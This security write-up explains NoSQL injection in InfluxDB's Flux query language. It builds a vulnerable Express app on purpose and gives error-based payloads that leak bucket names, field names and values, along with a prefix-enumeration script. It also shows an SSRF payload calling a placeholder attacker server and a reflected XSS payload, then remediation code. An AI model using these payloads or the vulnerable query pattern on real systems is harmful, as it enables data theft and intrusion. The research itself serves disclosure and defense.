InfluxDB NoSQL Injection

How I developed a NoSQL Injection exploit for InfluxDB

In this post, I'll share my experience of discovering a NoSQL Injection vulnerability during a Bug Bounty program, in a database that gets little attention within the hacking community.

During the initial discovery, I expected to find a good blog post or tool explaining how to exploit NoSQL Injection on InfluxDB. There was none, so I had to understand how this database works and develop my own payload techniques to leak data from it.

Furthermore, I'll explain how I took advantage of it to find an XSS and SSRF.

What is InfluxDB

InfluxDB is a popular open-source time series database that is designed for handling high volumes of timestamped data. InfluxDB is widely used for monitoring and analyzing metrics, events, and real-time data from various sources such as sensors, applications, and IoT devices.

Initial Vulnerability Discovery

During the web application analysis, I received the following error after sending the character " in a URL query parameter:

error @1:115-1:118: got unexpected token in string expression @1:118-1:118: EOF

This looked a lot like an injection issue, and after searching on Google, I concluded that the backend was using InfluxDB.

At this point, I started reading the documentation (https://docs.influxdata.com/influxdb/v2.7/) to figure out what was happening in the backend.

InfluxDB NoSQL Queries

This is a simple example of an InfluxDB query, written in Flux, the query language of InfluxDB 2.x:

from(bucket: "example-bucket")
    |> range(start: -1h)
    |> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag")

The given InfluxDB query retrieves data from the "example-bucket" within the last hour and filters the data based on specific conditions.

Here's a breakdown of each part of the query:

  1. from(bucket: "example-bucket"): This part specifies the source bucket from which the data will be retrieved. InfluxDB organizes data into buckets, and here, the data will be fetched from the "example-bucket." A bucket plays a role similar to a database in SQL systems.

  2. |> range(start: -1h): This part sets the time range for the data retrieval. The range function is used to define a time window. In this case, it specifies the last hour of data from the current time. The parameter start: -1h means the data will be fetched from one hour ago until the current time.

  3. |> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag"): This part applies a filter to the data based on certain conditions. The filter function is used to select specific data points that meet the defined criteria. The filter() performs operations similar to the SELECT statement and the WHERE clause in SQL-like languages.

In summary, the query fetches data from the "example-bucket" within the last hour and filters the data to include only those data points that belong to the measurement "example-measurement" and have a tag with the key "tag" and value "example-tag."

Building a Vulnerable Web Application

Now that we know the syntax, it's time to build our own vulnerable application, so we can develop a working proof of concept before applying it to real-world applications.

The following code is a vulnerable server example:

const express = require('express');
const {InfluxDB, Point} = require('@influxdata/influxdb-client')

const app = express();

const token = 'REDACTED' // InfluxDB Token
const url = 'https://127.0.0.1' // Local Database endpoint
const org = 'myOrg'
const bucket = 'publicBucket'

const client = new InfluxDB({url, token})

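async function query(fluxQuery) {
  // Keep state local so concurrent requests do not share it
  const results = []

  const queryApi = client.getQueryApi(org)

  // Stream the rows and convert each one to a plain object
  for await (const {values, tableMeta} of queryApi.iterateRows(fluxQuery)) {
    const o = tableMeta.toObject(values)
    console.log(o)
    results.push(o)
  }

  return results
}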

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      const result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

const port = 3000;

app.listen(port, () => {
  console.log(`Server started on port ${port}`);
});

In the above example, the server concatenates user-supplied input (req.query.data) into the InfluxDB query without any sanitization:

const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
const result = await query(fluxQuery)

Sending an HTTP request containing the character ", which terminates the string literal in the query, confirms that the server returns the same error previously seen on the Bug Bounty program's server.
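To see why a single double quote breaks the query, the concatenation can be reproduced outside the server. This is a minimal sketch: buildQuery is a hypothetical helper that mirrors the string concatenation in the /query handler, and it never talks to InfluxDB.

```javascript
// Hypothetical helper that mirrors the concatenation in the /query handler.
const bucket = 'publicBucket';

function buildQuery(data) {
  return 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + data + '") ';
}

// Benign input stays inside the string literal.
console.log(buildQuery('hello'));

// A lone double quote closes the literal early, so the trailing `")`
// opens a new string that is never terminated.
const broken = buildQuery('"');
console.log(broken);
```

The second query contains an odd number of double quotes, which is consistent with the parser complaining about an unexpected end of input inside a string expression.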

Building The Payload

Leaking Bucket Names

As mentioned earlier, bucket names in InfluxDB are like database names in SQL databases, and, as in an SQL Injection exploitation process, it's crucial to find a way to leak these bucket names to get access to the entire database.

After carefully reading the documentation, and assuming that the injection occurs inside the filter function, I arrived at the following error-based NoSQL Injection payload:

") |> yield(name: "1337") 
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) 
//

  1. The buckets() function lists all the buckets in the current organization.

  2. The filter() function uses the r.name expression to filter by bucket name, where r is a row returned by the buckets() query and name is a column of that row.

  3. As you can see, InfluxDB queries support regular expressions through the =~ operator, so the condition r.name =~ /^a.*/ is true if a bucket name starts with the letter a.

  4. After that, the filter uses an and condition that calls the die() function with the bucket name as a parameter. The die() function throws an error with the custom message passed in its msg parameter, which leaks the bucket name.

  5. The payload is also using the yield() function before the buckets query. This is necessary to perform "multiple queries" in a single request on InfluxDB.

  6. Finally, it's necessary to separate the yield() from the buckets query with a new line, and at the end of the payload, I added the // expression after another new line to comment everything after our injection.

In summary, if a bucket name that starts with the letter a exists in the database, it will trigger the die() function, which leaks the bucket name in the error message. If no bucket starts with the sent letter, the server will return an empty output with no errors.

Trying it on our vulnerable application, no error is returned for the letter a.

But sending the same payload with the letter p leaks the bucket name privateBucket.

To leak all bucket names, it's necessary to test every character and, after a match, extend the prefix with another character (for example pa, pb, pc ...).
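The prefix-by-prefix search can be automated with a depth-first walk. The sketch below is one possible approach, not the tooling used during the original research. It assumes each request leaks at most one name, and that oracle is a hypothetical async function that sends a payload to the target and resolves to the leaked name, or null when no error comes back. Here it is replaced by a local stand-in (fakeOracle) so the example runs without a server.

```javascript
// Characters tried at each position. This set is an assumption; extend it as needed.
const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-';

// Builds the error-based payload from this section for a given name prefix.
function bucketPayload(prefix) {
  return [
    '") |> yield(name: "1337") ',
    'buckets() |> filter(fn: (r) => r.name =~ /^' + prefix + '.*/ and die(msg:r.name)) ',
    '//',
  ].join('\n');
}

// Depth-first search over prefixes: whenever a prefix leaks a name,
// record it and keep extending the prefix to find siblings that share it.
async function leakBucketNames(oracle, prefix = '', found = new Set()) {
  for (const ch of ALPHABET) {
    const candidate = prefix + ch;
    const leaked = await oracle(bucketPayload(candidate));
    if (leaked === null) continue; // no bucket starts with this prefix
    found.add(leaked);
    await leakBucketNames(oracle, candidate, found);
  }
  return found;
}

// Local stand-in for the real target (hypothetical): it extracts the prefix
// from the payload and "leaks" the first bucket name that starts with it.
const simulatedBuckets = ['privateBucket', 'publicBucket'];
async function fakeOracle(payload) {
  const prefix = payload.match(/\/\^(.*)\.\*\//)[1];
  const hit = simulatedBuckets.find((name) => name.startsWith(prefix));
  return hit === undefined ? null : hit;
}

leakBucketNames(fakeOracle).then((names) => console.log([...names]));
```

Against a real target, oracle would issue the HTTP request and parse the bucket name out of the error text. That parsing depends on the exact error format returned by the application, so it is left out here.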

Leaking The Bucket Field Names

Now that we have the names of the buckets, we can try to fetch their contents. As with SQL databases, we sometimes need to specify column names to query specific data, and in this section, I will show a technique to leak these column names in InfluxDB.

During dynamic analysis, I was able to find a payload that triggers an error containing the data structure of any bucket:

") |> yield(name: "1337") 
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => die(msg:r)) 
 //

The above payload uses a similar technique, using the yield() function and adding a comment at the end of the payload:

  1. The payload now uses the from() function to fetch the data of the leaked bucket, then range(), which is required to bound the query, and finally filter().

  2. In the filter() function, I called die() again, but this time passing the entire result object as the parameter. Since the die() function only accepts strings and the result object carries the whole data structure of the bucket, the server triggers a verbose type error that leaks it.

The server leaked this structure:

_value: B,
_time: time,
_stop: time,
_start: time,
_measurement: string,
_field: string

Now that we know the query structure, we can use a regex comparison to force an error to leak all field names:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field =~ /s.*/ and die(msg:r._field))
 //

As we can see, the vulnerable app leaked the field name sensitive_field because it matched the regex condition r._field =~ /s.*/.

Leaking Field Values

After leaking all field names, we can try to leak field values. Field values are the "final node" of InfluxDB: they are where the data is stored, so leaking them is the last step of the exploitation. To do that, we can use the same technique used to leak the field names, but now specifying the field that we want to retrieve:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:r._value))
 //

By sending the above payload, the server responded with an error:

HttpError: runtime error @2:54-2:124: filter: type conflict: string != int

This occurs because the data stored on r._value is an integer and the die() function only accepts strings. To circumvent that, we can use the string() function to convert the integer value to a string, successfully leaking it in the error message:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:string(v:r._value)))
 //

The error message shows that the value of sensitive_field is 1337. This means that we were able to fetch arbitrary data from other buckets!
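Because these payloads span several lines, the newlines have to survive the trip through the query string. The following sketch shows one way to build the request URL. valuePayload and exploitUrl are hypothetical helper names, and the target is assumed to be the example server from this post listening on localhost:3000.

```javascript
// Builds the value-leak payload for a given bucket and field.
function valuePayload(bucketName, fieldName) {
  return [
    '") |> yield(name: "1337")',
    ' from(bucket: "' + bucketName + '") |> range(start: 0) |> filter(fn: (r) => r._field == "' + fieldName + '" and die(msg:string(v:r._value)))',
    ' //',
  ].join('\n');
}

// Places the payload in the `data` query parameter of the /query endpoint.
// URLSearchParams percent-encodes quotes and newlines (newline becomes %0A).
function exploitUrl(base, payload) {
  const url = new URL('/query', base);
  url.searchParams.set('data', payload);
  return url.toString();
}

// Assumed target: the example server from this post.
const url = exploitUrl('http://localhost:3000', valuePayload('privateBucket', 'sensitive_field'));
console.log(url);
```

Decoding the data parameter on the server side yields the original three-line payload, so the yield() call, the injected query, and the trailing comment each stay on their own line.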

InfluxDB Server-Side Request Forgery

While reading the documentation, I noticed that some InfluxDB functions accept a host parameter. One of these functions is from().

By sending the host parameter in the from() function we can make HTTP requests to arbitrary URLs. The following payload is an example of an SSRF using the NoSQL Injection vulnerability:

") |> yield(name: "1337")
 from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0)
 //

My Burp Collaborator server received the resulting request.

If the vulnerable application is using a local InfluxDB database, it's also possible to fetch internal endpoints.

This is not a vulnerability in InfluxDB. It is a feature being abused through a NoSQL Injection that arises from an insecure coding practice.

InfluxDB Cross-Site Scripting

Our example server is also prone to Reflected XSS attacks via the NoSQL Injection:

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      const result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

If you have an XSS radar like me, you'll notice that when an error occurs in the InfluxDB query, the try { } catch { } statement sends the error back to the client with the Content-Type set to text/html, allowing the browser to render HTML and execute JavaScript.

Furthermore, we can control some of the data that is reflected in these errors, especially via the die() function.

Since the query endpoint uses the GET method, it's possible to execute arbitrary JavaScript in a victim's browser by sending them a malicious link containing a payload such as:

") die(msg:"<img src=x onerror=alert(document.domain)>")//

This is not an InfluxDB vulnerability, because the issue arises from a NoSQL Injection caused by an insecure coding practice, combined with the text/html Content-Type that Express applies by default when res.send() receives a string.
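Both root causes can be addressed in the application code. The sketch below is a hand-rolled illustration rather than a vetted implementation: escapeFluxString and escapeHtml are hypothetical helpers, and the set of escaped characters is an assumption based on the escape sequences that Flux string literals accept. The official client package also exports a flux tagged-template helper for building queries from untrusted values, which is likely the better choice in practice.

```javascript
// Escapes a value for use inside a double-quoted Flux string literal.
// Hand-rolled sketch, not the client library's implementation.
function escapeFluxString(value) {
  return String(value)
    .replace(/\\/g, () => '\\\\') // backslash first, so later escapes are not doubled
    .replace(/"/g, () => '\\"')
    .replace(/\n/g, () => '\\n')
    .replace(/\r/g, () => '\\r')
    .replace(/\t/g, () => '\\t')
    .replace(/\$\{/g, () => '\\${'); // prevent string interpolation
}

// Escapes text before it is reflected in an HTML response.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The injection payload now stays inside the string literal on a single line.
const payload = '") |> yield(name: "1337")\nbuckets()\n//';
const safeQuery =
  'from(bucket:"publicBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' +
  escapeFluxString(payload) + '")';
console.log(safeQuery);

// The XSS payload is rendered as text instead of markup.
console.log(escapeHtml('<img src=x onerror=alert(document.domain)>'));
```

In the Express handler, an alternative to escaping the error is to call res.type('text/plain') before res.send(), so the browser never interprets the error message as HTML.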

Conclusion

In this blog post, I described my exploit development process for a NoSQL Injection vulnerability in a database that gets little attention within the hacking community, and how I leveraged this issue to achieve SSRF and XSS.

Did you find this article valuable?

Support Rafael da Costa Santos by becoming a sponsor. Any amount is appreciated!